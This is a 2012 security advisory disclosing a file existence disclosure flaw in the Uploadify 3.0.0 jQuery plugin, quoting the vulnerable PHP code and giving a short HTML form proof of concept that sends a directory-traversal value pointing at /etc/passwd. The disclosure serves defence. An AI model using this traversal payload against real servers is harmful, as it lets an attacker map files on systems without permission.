[waraxe-2012-SA#082] - File Existence Disclosure in Uploadify 3.0.0

Type securityvulns
Reporter Securityvulns
Modified 2012-04-09T00:00:00


[waraxe-2012-SA#082] - File Existence Disclosure in Uploadify 3.0.0

Author: Janek Vind "waraxe" Date: 05. April 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-82.html

Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Uploadify is a jQuery plugin that integrates a fully-customizable multiple file upload utility on your website. It uses a mixture of Javascript, ActionScript, and any server-side language to dynamically create an instance over any DOM element on a page.


Vulnerable versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Affected is Uploadify version 3.0.0.

  1. File Existence Disclosure vulnerability in "uploadify-check-exists.php"

Reason: missing input data validation Attack vector: user submitted POST parameter "filename" Preconditions: none Result: attacker can reveal existance of files and directories on remote system

Source code snippet from script "uploadify-check-exists.php": -----------------[ source code start ]--------------------------------- if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/uploads/' . $_POST['filename'])) { echo 1; } else { echo 0; } -----------------[ source code end ]-----------------------------------

We can see, that user submitted POST parameter "filename" is used in argument for php function "file_exists()". There is no input data validation, therefore attacker can use directory traversal and reveal existence of arbitrary files and directories on affected system.

Test: -----------------[ PoC code start ]----------------------------------- <html><body><center> <form action="http://localhost/uploadify-v3.0.0/uploadify-check-exists.php" method="post"> <input type="hidden" name="filename" value="../../../../../../../../etc/passwd"> <input type="submit" value="Test"> </form> </center></body></html> -----------------[ PoC code start ]-----------------------------------

Result: 1

Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------